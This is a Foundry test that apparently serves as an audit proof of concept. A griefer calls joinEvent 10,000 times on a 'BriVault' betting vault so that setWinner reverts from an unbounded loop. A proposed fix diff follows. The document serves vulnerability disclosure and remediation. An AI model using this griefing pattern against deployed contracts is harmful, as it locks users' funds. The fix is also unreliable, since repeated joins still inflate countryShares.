pragma solidity ^0.8.24;
import {Test} from "forge-std/Test.sol";
import {BriVault} from "../src/briVault.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {MockERC20} from "./MockErc20.t.sol";
contract WinnerSharesUnboundedLoopTest is Test {
BriVault vault;
MockERC20 token;
address owner = makeAddr("owner");
address griefer = makeAddr("griefer");
address fee = makeAddr("fee");
uint256 start;
uint256 end;
string[48] countries;
function setUp() public {
start = block.timestamp + 2 days;
end = start + 30 days;
token = new MockERC20("Mock", "M");
token.mint(griefer, 100 ether);
vm.startPrank(owner);
vault = new BriVault(
IERC20(address(token)),
150,
start,
fee,
0.0002 ether,
end
);
countries[10] = "Japan";
vault.setCountry(countries);
vm.stopPrank();
vm.startPrank(griefer);
token.approve(address(vault), type(uint256).max);
vault.deposit(5 ether, griefer);
}
function test_DoS_setWinner_by_UnboundedLoop() public {
for (uint256 i; i < 10_000; ++i) {
vault.joinEvent(10);
}
vm.stopPrank();
vm.warp(end + 1);
vm.startPrank(owner);
vm.expectRevert();
vault.setWinner(10);
vm.stopPrank();
}
}
@@
contract BriVault is ERC4626, Ownable {
@@
- address[] public usersAddress;
+ address[] public usersAddress; // (can be kept for analytics if deduped)
+ mapping(address => bool) internal isListed; // prevent duplicates in usersAddress
+ mapping(uint256 => uint256) public countryShares; // running total of shares per country
@@
function joinEvent(uint256 countryId) public {
if (stakedAsset[msg.sender] == 0) { revert noDeposit(); }
if (countryId >= teams.length) { revert invalidCountry(); }
if (block.timestamp > eventStartDate) { revert eventStarted(); }
userToCountry[msg.sender] = teams[countryId];
- uint256 participantShares = balanceOf(msg.sender);
- userSharesToCountry[msg.sender][countryId] = participantShares;
- usersAddress.push(msg.sender);
- numberOfParticipants++;
- totalParticipantShares += participantShares;
+ uint256 participantShares = balanceOf(msg.sender);
+ // Record the current shares for the chosen country
+ userSharesToCountry[msg.sender][countryId] = participantShares;
+ // Increase running total for this country
+ countryShares[countryId] += participantShares;
+ // Deduplicate the participants list to avoid bloat
+ if (!isListed[msg.sender]) {
+ isListed[msg.sender] = true;
+ usersAddress.push(msg.sender);
+ numberOfParticipants++;
+ }
emit joinedEvent(msg.sender, countryId);
}
@@
function cancelParticipation () public {
if (block.timestamp >= eventStartDate){ revert eventStarted(); }
- uint256 refundAmount = stakedAsset[msg.sender];
- stakedAsset[msg.sender] = 0;
- uint256 shares = balanceOf(msg.sender);
- _burn(msg.sender, shares);
- IERC20(asset()).safeTransfer(msg.sender, refundAmount);
+ uint256 refundAmount = stakedAsset[msg.sender];
+ stakedAsset[msg.sender] = 0;
+ uint256 shares = balanceOf(msg.sender);
+ // Reduce the country running total if user had joined
+ // (we need the user's last selected countryId; store it alongside the string to avoid string lookups)
+ // For minimal change, derive winnerCountryId-like index from userSharesToCountry map:
+ for (uint256 cid; cid < teams.length; ++cid) {
+ uint256 u = userSharesToCountry[msg.sender][cid];
+ if (u > 0) {
+ // remove their recorded shares and clear entry
+ if (countryShares[cid] >= u) countryShares[cid] -= u;
+ userSharesToCountry[msg.sender][cid] = 0;
+ break;
+ }
+ }
+ _burn(msg.sender, shares);
+ IERC20(asset()).safeTransfer(msg.sender, refundAmount);
}
@@
-function _getWinnerShares () internal returns (uint256) {
- for (uint256 i = 0; i < usersAddress.length; ++i){
- address user = usersAddress[i];
- totalWinnerShares += userSharesToCountry[user][winnerCountryId];
- }
- return totalWinnerShares;
-}
+// read the pre-aggregated total for the winner country
+function _getWinnerShares () internal returns (uint256) {
+ totalWinnerShares = countryShares[winnerCountryId];
+ return totalWinnerShares;
+}